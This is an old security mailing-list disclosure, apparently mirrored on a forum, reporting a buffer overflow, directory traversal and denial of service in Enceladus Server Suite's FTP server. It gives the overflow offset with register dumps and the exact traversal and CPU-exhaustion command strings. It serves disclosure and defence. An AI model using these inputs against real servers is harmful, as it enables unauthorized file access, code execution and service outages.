PDA

Bekijk Volledige Versie : Multiple vulnerability in Enceladus Server



securma massine
19/12/02, 20:34
--=_NextPart_Caramail_0174251040307898_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi
Enceladus Server Suite is an Internet/Intranet lightweight Web and
FTP Server for
Windows, the version 3.9 according to mollensoft "Includes a fix to
the directory traversal vulnerability... ( This is a CRITICAL
SECURITY UPDATE)"
http://www.mollensoft.com/
I found several vulnerability critical concerning this server
1-buffer overflow and remote code execution:
tamer notified that the waiter crashait with "long sequence of
characters as an argument to "CD" command"
(http://online.securityfocus.com/archive/1/302596)..I believe that
it passed dimensioned of a true buffer overflow because this crash
allows only a overwrite ' ESP and thusune simple attaque DOS
50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)
with argument "DIR" we can overwrite eip
dir+[buffer =3D279byte] >> eip is overwritet at:42,43,44,45
sufficient for the injection of a shellcode
the state of the registers is:

Access violation - code c0000005 (first chance)
eax=3D0012bcb8 ebx=3D0012c574 ecx=3D61616161 edx=3D7846f5b5 esi=3D0012bce0
edi=3D0019affd
eip=3D61616161 esp=3D0012bc20 ebp=3D0012bc40 iopl=3D0 nv up ei pl
zr na po nc
cs=3D001b ss=3D0023 ds=3D0023 es=3D0023 fs=3D003b gs=3D0000
efl=3D00000246
61616161 ?? ???

it is noticed whereas the eip is at the beginning of our buffer
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=3D4BYTE]
aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

the argument "mget" gives also the same result
the exploit is simple of realization since ebx point towards our
buffer
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61

2- directory traversal


ftp>cd ..
access denied
ftp>cd cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09
emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52
execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22
exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12
fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41
mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09
MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09
signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

[NO COMMENT]

3-denial of service and consume cpu
ftp> cd @/..@/..
(no reponse)
cpu 99% used

securma massine




__________________________________________________ _______
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)


--=_NextPart_Caramail_0174251040307898_ID--